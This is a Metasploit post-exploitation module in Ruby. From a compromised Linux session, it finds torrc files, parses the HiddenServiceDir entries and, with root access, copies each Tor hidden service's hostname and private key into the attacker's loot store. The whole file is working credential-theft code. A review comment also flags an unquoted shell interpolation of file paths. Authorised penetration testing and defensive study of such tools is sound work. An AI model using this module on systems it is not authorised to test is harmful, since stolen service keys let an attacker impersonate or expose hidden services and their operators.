GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/gather/tor_hiddenservices.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Adapted from post/linux/gather/enum_configs.rb
##
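# Post module that reads Tor hidden-service material from a Linux session.
#
# What it touches on the host, in order: the output of `locate torrc`, every
# torrc path that command reports, and then the files named `hostname` and
# `private_key` under each HiddenServiceDir value. The file contents are
# copied into the framework's loot store via store_loot.
#
# The private key is the service's identity. A service whose key file has
# been read by anything other than the Tor daemon should be treated as
# compromised and moved to a new key and address.
class MetasploitModule < Msf::Post
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Priv

  # Registers the module metadata (name, description, license, author,
  # platform and supported session types) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linux Gather TOR Hidden Services',
        'Description' => %q{
          This module collects the hostnames and private keys of
          any TOR Hidden Services running on the target machine. It
          will search for torrc and if found, will parse it for the
          directories of Hidden Services. However, root permissions
          are required to read them as they are owned by the user that
          TOR runs as, usually a separate account.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Harvey Phillips <xcellerator[at]gmx.com>',
        ],
        'Platform' => ['linux'],
        'SessionTypes' => ['shell', 'meterpreter']
      )
    )
  end

  # Entry point: prints the session's hostname and address, the distribution
  # version and kernel reported by get_sysinfo, then calls find_torrc.
  def run
    print_status("Running module against #{get_hostname} (#{session.session_host})")

    distro = get_sysinfo
    print_status('Info:')
    print_status("\t#{distro[:version]}")
    print_status("\t#{distro[:kernel]}")
    print_status('Looking for torrc...')
    find_torrc
  end

  # Stores one collected file as loot and prints where it was written.
  #
  # @param file [String] path whose basename is used as the loot file name
  # @param data [String] contents to store
  # @param ltype [String] loot type label
  # @param ctype [String] content type recorded with the loot
  def save(file, data, ltype, ctype = 'text/plain')
    fname = ::File.basename(file)
    loot = store_loot(ltype, ctype, session, data, fname)
    print_status("#{fname} stored in #{loot}")
  end

  # Locates torrc files, extracts their HiddenServiceDir values and, when the
  # session is root, stores each directory's hostname and private_key files.
  #
  # Each outcome is reported exactly once: no torrc, no hidden services, or
  # hidden services present but unreadable without root. The root message is
  # no longer printed when nothing was found.
  def find_torrc
    fail_with(Failure::BadConfig, "'locate' command does not exist") unless command_exists?('locate')

    config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
    if config.empty?
      print_error('No torrc file found, maybe it goes by a different name?')
      return
    end

    # NOTE(review): each path reported by locate is interpolated into the
    # command line without quoting, so a path containing whitespace or shell
    # metacharacters is not handed to cat as a single argument. Escape the
    # path before building the command.
    #
    # `grep -v '#'` drops every line that contains a '#', not only lines that
    # start with one; the second space-separated field is taken as the
    # directory. Duplicates across torrc files are collapsed.
    hidden = config.flat_map do |c|
      print_good("Torrc file found at #{c}")
      cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
    end.uniq

    if hidden.empty?
      print_bad('No hidden services were found!')
      return
    end
    print_good("#{hidden.length} hidden services have been found!")

    unless is_root?
      print_error('Hidden Services were found, but we need root to access the directories')
      return
    end

    # All hostname files are stored first, then all private_key files. Paths
    # are built by plain concatenation, so the directory value is used
    # exactly as it is written in torrc. The loot type carries the last path
    # component of the directory.
    [%w[hostname hostname], %w[private_key privatekey]].each do |filename, label|
      hidden.each do |f|
        output = read_file("#{f}#{filename}")
        next unless output && output !~ /No such file or directory/

        save(f, output, "tor.#{f.split('/')[-1]}.#{label}")
      end
    end
  end
end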